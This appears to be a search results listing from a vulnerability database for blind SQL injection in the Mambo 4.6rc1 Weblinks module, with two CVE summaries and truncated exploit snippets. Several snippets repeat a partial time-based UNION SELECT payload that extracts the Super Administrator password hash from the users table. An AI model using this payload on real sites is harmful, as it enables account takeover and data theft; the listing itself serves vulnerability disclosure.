6 matches found
CVE-2006-3262
SQL injection vulnerability in the Weblinks module weblinks.php in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter...
CVE-2006-3263
SQL injection vulnerability in the Weblinks module weblinks.php in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the catid parameter...
CVE-2006-3262
SQL injection vulnerability in the Weblinks module weblinks.php in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter...
mambo_46rc1_sql.txt
!/usr/bin/php -q -d shortopentag=on mysqld --log=mambo.txt now login, go to "Submit Weblink" feature, in "Name: " field type: 99999' UNION SELECT IF ASCIISUBSTRINGpassword,1,1=0 & 1, benchmark200000000,CHAR0,0 FROM mosusers WHERE usertype='Super Administrator'/ in mambo.txt we have: 13 Query SELE...
Mambo 4.6rc1 - Weblinks Blind SQL Injection (1)
Mambo 4.6rc1 - Weblinks Blind SQL Injection 1 !/usr/bin/php -q -d shortopentag=on mysqld --log=mambo.txt now login, go to "Submit Weblink" feature, in "Name: " field type: 99999' UNION SELECT IF ASCIISUBSTRINGpassword,1,1=0 & 1, benchmark200000000,CHAR0,0 FROM mosusers WHERE usertype='Super...
Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ====================================================== Mambo mysqld --log=mambo.txt now login, go to "Submit Weblink" feature, in "Name: " field type: 99999' UNION SELECT IF ASCIISUBSTRINGpassword,1,1=0 & 1, benchmark200000000,CHAR0,0 FROM...